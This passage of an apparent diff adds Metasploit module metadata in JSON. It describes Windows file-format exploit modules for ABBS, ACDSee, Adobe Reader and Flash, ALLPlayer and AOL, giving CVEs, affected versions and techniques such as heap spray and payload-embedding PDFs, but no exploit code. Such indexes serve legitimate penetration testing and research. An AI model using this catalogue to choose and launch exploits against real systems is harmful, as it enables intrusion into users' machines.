"windows/fileformat/a_pdf_wav_to_mp3", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/abbs_amp_lst": { + "name": "ABBS Audio Media Player .LST Buffer Overflow", + "fullname": "exploit/windows/fileformat/abbs_amp_lst", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-30", + "type": "exploit", + "author": [ + "Julian Ahrens", + "modpr0be " + ], + "description": "This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability\n occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges\n of the user running the application. This module has been tested successfully on\n ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.", + "references": [ + "OSVDB-75096", + "EDB-25204" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/abbs_amp_lst.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/abbs_amp_lst", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/acdsee_fotoslate_string": { + "name": "ACDSee FotoSlate PLP File id Parameter Overflow", + "fullname": "exploit/windows/fileformat/acdsee_fotoslate_string", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-09-12", + "type": "exploit", + "author": [ + "Parvez Anwar", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via\n a specially crafted id parameter in a String element. When viewing a malicious\n PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a\n buffer and execute arbitrary code. This exploit has been tested on systems such as\n Windows XP SP3, Windows Vista, and Windows 7.", + "references": [ + "CVE-2011-2595", + "OSVDB-75425", + "BID-49558" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ACDSee FotoSlate 4.0 Build 146" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/acdsee_fotoslate_string", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/acdsee_xpm": { + "name": "ACDSee XPM File Section Buffer Overflow", + "fullname": "exploit/windows/fileformat/acdsee_xpm", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-11-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in ACDSee 9.0.\n When viewing a malicious XPM file with the ACDSee product,\n a remote attacker could overflow a buffer and execute\n arbitrary code.", + "references": [ + "CVE-2007-2193", + "OSVDB-35236", + "BID-23620" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ACDSee 9.0 (Build 1008)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/acdsee_xpm.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/acdsee_xpm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/actfax_import_users_bof": { + "name": "ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow", + "fullname": "exploit/windows/fileformat/actfax_import_users_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-08-28", + "type": "exploit", + "author": [ + "Craig Freyman", + "Brandon Perry", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in ActiveFax Server. The vulnerability is\n a stack based buffer overflow in the \"Import Users from File\" function, due to the\n insecure usage of strcpy while parsing the csv formatted file. The module creates a\n .exp file that must be imported with ActiveFax Server. It must be imported with the\n default character set 'ECMA-94 / Latin 1 (ISO 8859)'. The module has been tested\n successfully on ActFax Server 4.32 over Windows XP SP3 and Windows 7 SP1. In the\n Windows XP case, when ActFax runs as a service, it will execute as SYSTEM.", + "references": [ + "OSVDB-85175", + "EDB-20915", + "URL-http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/actfax_import_users_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/actfax_import_users_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/activepdf_webgrabber": { + "name": "activePDF WebGrabber ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/fileformat/activepdf_webgrabber", + "aliases": [], + "rank": 100, + "disclosure_date": "2008-08-26", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When\n sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)\n an attacker may be able to execute arbitrary code. This control is not marked safe\n for scripting, so choose your attack vector accordingly.", + "references": [ + "OSVDB-64579", + "URL-http://www.activepdf.com/products/serverproducts/webgrabber/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/activepdf_webgrabber.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/activepdf_webgrabber", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_collectemailinfo": { + "name": "Adobe Collab.collectEmailInfo() Buffer Overflow", + "fullname": "exploit/windows/fileformat/adobe_collectemailinfo", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-02-08", + "type": "exploit", + "author": [ + "MC ", + "Didier Stevens " + ], + "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.\n By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-5659", + "OSVDB-41495" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_collectemailinfo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_cooltype_sing": { + "name": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/adobe_cooltype_sing", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-09-07", + "type": "exploit", + "author": [ + "Unknown", + "sn0wfl0w", + "jduck " + ], + "description": "This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n assumed to be vulnerable as well.", + "references": [ + "CVE-2010-2883", + "OSVDB-67849", + "URL-http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html", + "URL-http://www.adobe.com/support/security/advisories/apsa10-02.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_cooltype_sing", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_flashplayer_button": { + "name": "Adobe Flash Player \"Button\" Remote Code Execution", + "fullname": "exploit/windows/fileformat/adobe_flashplayer_button", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-10-28", + "type": "exploit", + "author": [ + "Unknown", + "Haifei Li", + "jduck " + ], + "description": "This module exploits a vulnerability in the handling of certain SWF movies\n within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\n are also vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due to a hardcoded syscall number.", + "references": [ + "CVE-2010-3654", + "OSVDB-68932", + "BID-44504", + "URL-http://www.adobe.com/support/security/advisories/apsa10-05.html", + "URL-http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/", + "URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_flashplayer_button", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_flashplayer_newfunction": { + "name": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", + "fullname": "exploit/windows/fileformat/adobe_flashplayer_newfunction", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-06-04", + "type": "exploit", + "author": [ + "Unknown", + "jduck " + ], + "description": "This module exploits a vulnerability in the DoABC tag handling within\n versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due a the hardcoded syscall number.", + "references": [ + "CVE-2010-1297", + "OSVDB-65141", + "BID-40586", + "URL-http://www.adobe.com/support/security/advisories/apsa10-01.html", + "URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_flashplayer_newfunction", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_flatedecode_predictor02": { + "name": "Adobe FlateDecode Stream Predictor 02 Integer Overflow", + "fullname": "exploit/windows/fileformat/adobe_flatedecode_predictor02", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-10-08", + "type": "exploit", + "author": [ + "unknown", + "jduck " + ], + "description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe\n Acrobat Professional versions before 9.2.", + "references": [ + "CVE-2009-3459", + "BID-36600", + "OSVDB-58729", + "URL-http://web.archive.org/web/20201207001443/https://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html/", + "URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader Windows Universal (JS Heap Spray)" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_flatedecode_predictor02", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_geticon": { + "name": "Adobe Collab.getIcon() Buffer Overflow", + "fullname": "exploit/windows/fileformat/adobe_geticon", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-03-24", + "type": "exploit", + "author": [ + "MC ", + "Didier Stevens ", + "jduck " + ], + "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n crafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.", + "references": [ + "CVE-2009-0927", + "OSVDB-53647", + "ZDI-09-014" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader Universal (JS Heap Spray)" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_geticon.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_geticon", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_illustrator_v14_eps": { + "name": "Adobe Illustrator CS4 v14.0.0", + "fullname": "exploit/windows/fileformat/adobe_illustrator_v14_eps", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-03", + "type": "exploit", + "author": [ + "pyrokinesis", + "dookie" + ], + "description": "Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)\n overlong DSC Comment Buffer Overflow Exploit", + "references": [ + "CVE-2009-4195", + "BID-37192", + "OSVDB-60632", + "EDB-10281" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_illustrator_v14_eps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_jbig2decode": { + "name": "Adobe JBIG2Decode Memory Corruption", + "fullname": "exploit/windows/fileformat/adobe_jbig2decode", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-02-19", + "type": "exploit", + "author": [ + "natron ", + "xort", + "redsand", + "MC ", + "Didier Stevens " + ], + "description": "This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.\n This module relies upon javascript for the heap spray.", + "references": [ + "CVE-2009-0658", + "OSVDB-52073" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader v9.0.0 (Windows XP SP3 English)", + "Adobe Reader v8.1.2 (Windows XP SP2 English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_jbig2decode.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_jbig2decode", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_libtiff": { + "name": "Adobe Acrobat Bundled LibTIFF Integer Overflow", + "fullname": "exploit/windows/fileformat/adobe_libtiff", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-02-16", + "type": "exploit", + "author": [ + "Microsoft", + "villy ", + "jduck " + ], + "description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions 8.0 through 8.2 and 9.0 through 9.3.", + "references": [ + "CVE-2010-0188", + "BID-38195", + "OSVDB-62526", + "URL-http://www.adobe.com/support/security/bulletins/apsb10-07.html", + "URL-http://web.archive.org/web/20100223002318/http://secunia.com:80/blog/76", + "URL-http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_libtiff.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_libtiff", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_media_newplayer": { + "name": "Adobe Doc.media.newPlayer Use After Free Vulnerability", + "fullname": "exploit/windows/fileformat/adobe_media_newplayer", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-12-14", + "type": "exploit", + "author": [ + "unknown", + "hdm ", + "pusscat ", + "jduck " + ], + "description": "This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions up to and including 9.2.", + "references": [ + "CVE-2009-4324", + "BID-37331", + "OSVDB-60980" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader Windows English (JS Heap Spray)", + "Adobe Reader Windows German (JS Heap Spray)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_media_newplayer.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_media_newplayer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_pdf_embedded_exe": { + "name": "Adobe PDF Embedded EXE Social Engineering", + "fullname": "exploit/windows/fileformat/adobe_pdf_embedded_exe", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-03-29", + "type": "exploit", + "author": [ + "Colin Ames ", + "jduck " + ], + "description": "This module embeds a Metasploit payload into an existing PDF file. The\n resulting PDF can be sent to a target as part of a social engineering attack.", + "references": [ + "CVE-2010-1240", + "OSVDB-63667", + "URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/", + "URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/", + "URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/", + "URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7/10 (English)" + ], + "mod_time": "2024-08-26 16:47:26 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_pdf_embedded_exe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_pdf_embedded_exe_nojs": { + "name": "Adobe PDF Escape EXE Social Engineering (No JavaScript)", + "fullname": "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-03-29", + "type": "exploit", + "author": [ + "Jeremy Conway " + ], + "description": "This module embeds a Metasploit payload into an existing PDF file in\n a non-standard method. The resulting PDF can be sent to a target as\n part of a social engineering attack.", + "references": [ + "CVE-2010-1240", + "OSVDB-63667", + "URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/", + "URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/", + "URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/", + "URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader <= v9.3.3 (Windows XP SP3 English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_pdf_embedded_exe_nojs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_reader_u3d": { + "name": "Adobe Reader U3D Memory Corruption Vulnerability", + "fullname": "exploit/windows/fileformat/adobe_reader_u3d", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-12-06", + "type": "exploit", + "author": [ + "Felipe Andres Manzano", + "sinn3r ", + "juan vazquez ", + "jduck " + ], + "description": "This module exploits a vulnerability in the U3D handling within\n versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader.\n The vulnerability is due to the use of uninitialized memory.\n\n Arbitrary code execution is achieved by embedding specially crafted U3D\n data into a PDF document. A heap spray via JavaScript is used in order to\n ensure that the memory used by the invalid pointer issue is controlled.", + "references": [ + "CVE-2011-2462", + "OSVDB-77529", + "BID-50922", + "URL-http://www.adobe.com/support/security/advisories/apsa11-04.html", + "URL-http://web.archive.org/web/20210228195907/http://blog.9bplus.com/analyzing-cve-2011-2462/", + "URL-https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0", + "URL-http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_reader_u3d.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_reader_u3d", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_toolbutton": { + "name": "Adobe Reader ToolButton Use After Free", + "fullname": "exploit/windows/fileformat/adobe_toolbutton", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-08-08", + "type": "exploit", + "author": [ + "Soroush Dalili", + "Unknown", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\n the cEnable callback can be used to early free the object memory. Later use of the object\n allows triggering the use after free condition. This module has been tested successfully\n on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in\n November, 2013.", + "references": [ + "CVE-2013-3346", + "OSVDB-96745", + "ZDI-13-212", + "URL-http://www.adobe.com/support/security/bulletins/apsb13-15.html", + "URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP / Adobe Reader 9/10/11" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_toolbutton.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_toolbutton", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_u3d_meshdecl": { + "name": "Adobe U3D CLODProgressiveMeshDeclaration Array Overrun", + "fullname": "exploit/windows/fileformat/adobe_u3d_meshdecl", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-10-13", + "type": "exploit", + "author": [ + "Felipe Andres Manzano ", + "jduck " + ], + "description": "This module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.4, < 8.2, and < 9.3. By creating a\n specially crafted pdf that a contains malformed U3D data, an attacker may\n be able to execute arbitrary code.", + "references": [ + "CVE-2009-3953", + "OSVDB-61690", + "URL-http://www.adobe.com/support/security/bulletins/apsb10-02.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader Windows Universal (JS Heap Spray)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_u3d_meshdecl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/adobe_utilprintf": { + "name": "Adobe util.printf() Buffer Overflow", + "fullname": "exploit/windows/fileformat/adobe_utilprintf", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-02-08", + "type": "exploit", + "author": [ + "MC ", + "Didier Stevens " + ], + "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional\n < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()\n entry, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-2992", + "OSVDB-49520" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader v8.1.2 (Windows XP SP3 English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/adobe_utilprintf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/adobe_utilprintf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/allplayer_m3u_bof": { + "name": "ALLPlayer M3U Buffer Overflow", + "fullname": "exploit/windows/fileformat/allplayer_m3u_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-09", + "type": "exploit", + "author": [ + "metacom", + "Mike Czumak", + "Gabor Seljan" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n ALLPlayer 5.8.1, caused by a long string in a playlist entry.\n By persuading the victim to open a specially-crafted .M3U file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows 7 SP1.", + "references": [ + "CVE-2013-7409", + "BID-62926", + "BID-63896", + "EDB-28855", + "EDB-29549", + "EDB-29798", + "EDB-32041", + "OSVDB-98283", + "URL-http://www.allplayer.org/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + " ALLPlayer 2.8.1 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/allplayer_m3u_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/altap_salamander_pdb": { + "name": "Altap Salamander 2.5 PE Viewer Buffer Overflow", + "fullname": "exploit/windows/fileformat/altap_salamander_pdb", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-06-19", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a buffer overflow in Altap Salamander <= v2.5.\n By creating a malicious file and convincing a user to view the file with\n the Portable Executable Viewer plugin within a vulnerable version of\n Salamander, the PDB file string is copied onto the stack and the\n SEH can be overwritten.", + "references": [ + "CVE-2007-3314", + "BID-24557", + "OSVDB-37579", + "URL-http://vuln.sg/salamander25-en.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal Salamander 2.5" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/altap_salamander_pdb.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/altap_salamander_pdb", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/aol_desktop_linktag": { + "name": "AOL Desktop 9.6 RTX Buffer Overflow", + "fullname": "exploit/windows/fileformat/aol_desktop_linktag", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-01-31", + "type": "exploit", + "author": [ + "sup3r", + "sickn3ss", + "sinn3r ", + "mr_me ", + "silent_dream" + ], + "description": "This module exploits a vulnerability found in AOL Desktop 9.6's Tool\\rich.rct\n component. By supplying a long string of data in the hyperlink tag, rich.rct copies\n this data into a buffer using a strcpy function, which causes an overflow, and\n results arbitrary code execution.", + "references": [ + "OSVDB-70741", + "EDB-16085" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "AOL Desktop 9.6 on Windows XP SP3", + "AOL Desktop 9.6 on Windows XP SP3 - NX bypass", + "AOL Desktop 9.6 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/aol_desktop_linktag.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/aol_desktop_linktag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/aol_phobos_bof": { + "name": "AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow", + "fullname": "exploit/windows/fileformat/aol_phobos_bof", + "aliases": [], + "rank": 200, + "disclosure_date": "2010-01-20", + "type": "exploit", + "author": [ + "Trancer " + ], + "description": "This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.\n By setting an overly long value to 'Import()', an attacker can overrun a buffer\n and execute arbitrary code.\n\n NOTE: This ActiveX control is NOT marked safe for scripting or initialization.", + "references": [ + "OSVDB-61964", + 